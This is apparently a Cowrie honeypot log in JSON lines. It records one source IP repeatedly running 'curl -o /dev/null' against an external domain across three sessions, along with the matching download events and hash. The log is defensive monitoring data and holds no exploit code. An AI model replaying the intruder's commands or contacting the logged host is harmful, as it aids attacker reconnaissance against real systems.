{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.904058Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.906049Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.911354Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.926992Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.927680Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.930773Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.933524Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.936106Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.939181Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.939745Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.941765Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.942367Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.971765Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.974025Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.975627Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.976274Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.979597Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.980056Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.981925Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.982566Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.016997Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.019462Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.020972Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.021735Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.024358Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.025250Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.027564Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.028352Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.030955Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.060805Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.061535Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.068802Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.069437Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.091810Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.092431Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.097762Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.098332Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.104281Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.104835Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.131637Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.133709Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.137349Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.137975Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.140228Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.140901Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.149763Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.153010Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.153908Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.154426Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.156892Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.206317Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.207393Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.207973Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.211197Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.213237Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.214454Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.214974Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.216313Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.216988Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.219990Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.249522Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.251564Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.255995Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.256581Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.259251Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.260060Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.263061Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.263641Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.293139Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.293773Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.299978Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.300533Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.301784Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.302506Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.332757Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.334979Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.338211Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.339200Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.339685Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.345098Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.346003Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.346541Z","src_ip":"212.227.125.160","session":"9f264c568782"}
